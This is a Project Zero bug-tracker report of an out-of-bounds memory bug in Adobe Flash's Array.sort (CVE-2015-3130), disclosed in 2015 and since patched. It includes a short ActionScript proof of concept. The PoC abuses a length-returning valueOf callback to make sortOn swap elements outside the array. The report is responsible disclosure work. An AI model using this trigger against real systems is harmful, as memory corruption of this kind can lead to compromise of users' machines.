374 - Adobe Flash: Array.sort can go out of bounds - project-zero

Starred by 2 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Jul 2015
Cc:	project-...@google.com
Finder-natashenka Deadline-90 Fixed-2015-Jul-8 CVE-2015-3130 Reported-2015-May-7 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: Array.sort can go out of bounds

Project Member Reported by natashenka@google.com, May 7 2015

Back to list

If the length of an array is overridden so that it returns a long length, and then later a short one, Array.sort can swap array elements that are out of bounds of the array in memory.

A PoC is as follows:

var s = 1;

var rec_array:Array = new Array();
rec_array.push({name: "john", city: "omaha", zip: 68144});
rec_array.push({name: "john", city: "kansas city", zip: 72345});
rec_array.push({name: "bob", city: "omaha", zip: 94010});

var n = {valueOf : gl};
rec_array.length = n;

rec_array.sortOn(["name", "city"]);
for(i=0; i<rec_array.length; i++){
    trace(rec_array[i].name + ", " + rec_array[i].city);
}

function gl(){
	
	trace(s);
		if(s< 3){
		s++;
		return 100000;
	}else{
		return 3;		
		}
	}

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

arraysort.swf
826 bytes Download

arraysort.fla
4.8 KB Download

Project Member Comment 1 by natashenka@google.com, May 8 2015

This is PSIRT-3659

Comment 2 by cevans@google.com, Jul 5 2015

Labels: CVE-2015-3130

Comment 3 by cevans@google.com, Jul 9 2015

Labels: Fixed-2015-Jul-8
Status: Fixed

Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Project Member Comment 4 by natashenka@google.com, Aug 3 2015

Labels: -Restrict-View-Commit

► Sign in to add a comment